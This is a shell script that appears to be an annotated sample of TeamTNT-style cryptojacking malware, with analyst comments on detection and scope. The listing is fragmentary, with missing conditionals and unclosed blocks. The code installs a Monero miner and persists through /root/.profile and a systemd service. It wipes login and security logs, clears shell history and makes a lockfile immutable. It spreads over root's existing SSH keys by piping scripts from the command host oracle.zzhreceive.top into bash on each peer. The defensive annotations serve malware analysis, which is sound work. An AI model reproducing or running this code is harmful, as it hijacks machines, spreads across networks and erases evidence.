if [ "$(id -u)" == "0" ]; then
echo "running as root... its all OKAY!"
echo "running not as root... first starting tmp setup..."
# checking prerequisites
# Wallet sanity check: the part before the first "." must be 95 chars.
if [ -z $WALLET ]; then
echo "ERROR: wallet"
exit 1
WALLET_BASE=`echo $WALLET | cut -f1 -d"."`
if [ ${#WALLET_BASE} != 95 ]; then
echo "ERROR: Wrong wallet base address length (should be 95): ${#WALLET_BASE}"
exit 1
if [ -z $MOHOME ]; then
echo "ERROR: Please define HOME environment variable to your home directory"
exit 1
if [ ! -d $MOHOME ]; then
echo "ERROR: Please make sure HOME directory $MOHOME exists or set it yourself using this command:"
echo ' export HOME=<dir>'
exit 1
# curl is installed via apt or yum if missing — package-manager logs will
# record this on hosts that did not previously have curl.
if ! type curl >/dev/null; then
apt-get update --fix-missing 2>/dev/null 1>/dev/null
apt-get install -y curl 2>/dev/null 1>/dev/null
apt-get install -y --reinstall curl 2>/dev/null 1>/dev/null
yum clean all 2>/dev/null 1>/dev/null
yum install -y curl 2>/dev/null 1>/dev/null
yum reinstall -y curl 2>/dev/null 1>/dev/null
sleep 2
$MOHOME/[crypto] --help >/dev/null
if (test $? -ne 0); then
SetupMoneroOcean1
echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
if [ -f "$MOHOME/[crypto].pid" ]
echo "config file exists, neednot backup"
echo "config file not exists.download from teamtnt"
SetupMoneroOcean1
# Fallback download paths: stock xmrig from GitHub, or "father.jpg" from
# the C2 host; config from "cf.jpg".
if [ -f "$MOHOME/[crypto]" ]
echo "miner file exists"
curl -L --progress-bar $miner_url -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && mv $MOHOME/xmrig*/xmrig $MOHOME/\[crypto\]
if [ -f "$MOHOME/[crypto].pid" ]
echo "miner config exists"
curl -L --progress-bar $config_url -o $MOHOME/\[crypto\].pid
rm /tmp/xmrig.tar.gz
if [ -f "$MOHOME/[crypto]" ]
echo "miner file exists, neednot backup"
curl -L --progress-bar $miner_url_backup -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && chmod +x $MOHOME/\[crypto\]
rm /tmp/cf.tar
# Config rewrite: pool, wallet, coin, CPU cap, log file and syslog flag.
sed -i 's/"url": *"[^"]*",/"url": "xmr-asia1.nanopool.org:14444",/' $MOHOME/[crypto].pid
sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'",/' $MOHOME/[crypto].pid
sed -i 's/"coin": *[^"]*,/"coin": "monero",/' $MOHOME/[crypto].pid
sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' $MOHOME/[crypto].pid
sed -i 's#"log-file": *null,#"log-file": "'$MOHOME/[crypto].log'",#' $MOHOME/[crypto].pid
sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $MOHOME/[crypto].pid
cp $MOHOME/[crypto].pid $MOHOME/config_background.json
sed -i 's/"background": *false,/"background": true,/' $MOHOME/config_background.json
# preparing script
# Launcher script /usr/share/[crypto].sh; the heredoc's closing EOL is not
# present in the listing.
echo "[*] Creating $MOHOME/[crypto].sh script"
cat >$MOHOME/[crypto].sh <<EOL
#!/bin/bash
if ! pidof [crypto] >/dev/null; then
nice $MOHOME/[crypto] \$*
echo "Monero miner is already running in the background. Refusing to run another one."
echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first."
chmod +x $MOHOME/[crypto].sh
# preparing script background work and work under reboot
# Persistence path 1 (no sudo): append the launcher to /root/.profile.
if ! sudo -n true 2>/dev/null; then
if ! grep $MOHOME/[crypto].sh /root/.profile >/dev/null; then
echo "[*] Adding $MOHOME/[crypto].sh script to /root/.profile"
echo "$MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1" >>/root/.profile
echo "Looks like $MOHOME/[crypto].sh script is already in the /root/.profile"
echo "[*] Running crypto service in the background (see logs in $MOHOME/[crypto].log file)"
/bin/bash $MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1
# `>` inside [[ ]] is a string comparison, not numeric, so this hugepages
# branch does not reliably reflect MemTotal.
if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
echo "[*] Enabling huge pages"
echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
# Persistence path 2 (systemd): unit written to /tmp then moved into
# /etc/systemd/system/crypto.service and enabled. Closing EOL not shown.
if ! type systemctl >/dev/null; then
/bin/bash $MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1
echo "[*] Creating crypto systemd service"
cat >/tmp/crypto.service <<EOL
[Unit]
Description=crypto system service
[Service]
ExecStart=$MOHOME/[crypto] --config=$MOHOME/[crypto].pid
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
sudo mv /tmp/crypto.service /etc/systemd/system/crypto.service
echo "[*] Starting crypto systemd service"
sudo killall [crypto] 2>/dev/null
sudo systemctl daemon-reload
sudo systemctl enable crypto.service
sudo systemctl start crypto.service
# localgo: log wiping and lateral movement over existing SSH trust.
# The root mail spool, wtmp (login history) and /var/log/secure are
# truncated. Then, if root has a key pair and a known_hosts file, every
# IPv4 address found in known_hosts is contacted with BatchMode (key-only)
# SSH and told to fetch and run b.sh from the C2 host.
# Detection: empty /var/log/wtmp and /var/log/secure on the source host;
# on peers, sshd "Accepted publickey for root" from the infected host
# followed by an outbound curl to oracle.zzhreceive.top.
# Scope: spread only reaches hosts where root's existing key is already
# authorized, so revoking that key and auditing known_hosts peers bounds
# the blast radius. The second loop uses "cd1" in place of curl — likely
# a typo or deliberate variation; it fails unless such a command exists.
# Function body is not closed in the listing.
localgo() {
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o- http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done
# Main sequence. `makesshaxx` and `checksshkeys` are called but not defined
# anywhere in this listing (their names suggest SSH-key handling — confirm
# from the complete sample). LockDownTheSystem is defined above but never
# called here.
KILLMININGSERVICES
SetupMoneroOcean
makesshaxx
checksshkeys
SecureTheSystem
FixTheSystem
# First-run marker: /var/tmp/.alsp (content "lockfile", made immutable).
# Its presence means localgo (log wipe + SSH spread) has already run once
# on this host; its absence does not prove the script never ran.
if [ ! -f "/var/tmp/.alsp" ]; then
localgo
echo 'lockfile' > /var/tmp/.alsp
tntrecht +i /var/tmp/.alsp || chattr +i /var/tmp/.alsp
echo "replay .. i know this server ..."
echo ""
echo "[*] Setup complete"
# Second-stage fetch: cronis.sh from the C2 host is piped straight into
# bash (the "cd1" variant again). Then the shell history is cleared.
curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
cd1 -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
history -c
## now the bad part of the script###